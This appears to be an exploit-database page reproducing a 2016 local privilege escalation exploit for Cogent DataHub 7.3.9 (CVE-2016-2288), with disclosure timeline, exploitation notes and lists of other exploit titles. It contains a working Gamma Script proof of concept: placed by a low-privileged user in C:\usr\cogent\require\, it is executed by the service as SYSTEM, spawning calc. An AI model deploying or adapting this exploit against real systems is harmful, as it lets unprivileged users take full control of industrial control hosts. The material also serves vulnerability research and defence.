"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation"

Author

Exploit author

mr_me

Platform

Exploit platform

windows

Release date

Exploit published date

2016-03-28

                
                    
                         Download file
                    
                
            
/*

# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288

sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792  CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01

Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released

Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script

Exploitation:
=============

As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.

C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Cogent DataHub
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cogent DataHub
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\Users\steven>
*/

require ("Application");
require ("AsyncRun");				// thanks to our friends @ Cogent

class WebstreamSupport Application
{

}

method WebstreamSupport.constructor ()
{
	RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}

Webstream = ApplicationSingleton (WebstreamSupport);

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2020-02-06	"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection"	webapps	java	mr_me
2020-02-06	"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection"	webapps	java	mr_me
2020-02-06	"Cisco Data Center Network Manager 11.2 - Remote Code Execution"	webapps	java	mr_me
2019-12-12	"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution"	webapps	multiple	mr_me
2019-05-17	"Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution"	remote	linux	mr_me
2018-08-20	"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution"	remote	php	mr_me
2018-06-25	"Foxit Reader 9.0.1.1049 - Remote Code Execution"	remote	windows	mr_me
2018-01-28	"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution"	remote	linux	mr_me
2018-01-15	"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution"	remote	hardware	mr_me
2018-01-03	"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation"	local	windows	mr_me
2017-10-30	"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure"	webapps	xml	mr_me
2017-09-12	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)"	local	windows	mr_me
2017-09-06	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation"	local	windows	mr_me
2017-09-06	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)"	local	windows	mr_me
2017-07-05	"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution"	remote	php	mr_me
2016-05-09	"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution"	remote	windows	mr_me
2016-03-28	"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation"	local	windows	mr_me
2016-03-07	"ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution"	webapps	php	mr_me
2012-06-15	"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution"	webapps	php	mr_me
2012-06-14	"XM Easy Personal FTP Server 5.30 - Remote Format String Write4"	remote	windows	mr_me
2011-12-23	"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities"	webapps	php	mr_me
2011-12-09	"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution"	webapps	php	mr_me
2011-12-04	"Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution"	webapps	php	mr_me
2011-09-22	"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow"	remote	windows	mr_me
2011-09-12	"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow"	local	windows	mr_me
2011-07-31	"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)"	remote	windows	mr_me
2011-06-20	"Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)"	remote	windows	mr_me
2011-06-20	"Black Ice Fax Voice SDK 12.6 - Remote Code Execution"	remote	windows	mr_me
2011-03-11	"Linux NTP query client 4.2.6p1 - Heap Overflow"	dos	linux	mr_me
2011-03-09	"Maian Weblog 4.0 - Blind SQL Injection"	webapps	php	mr_me

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.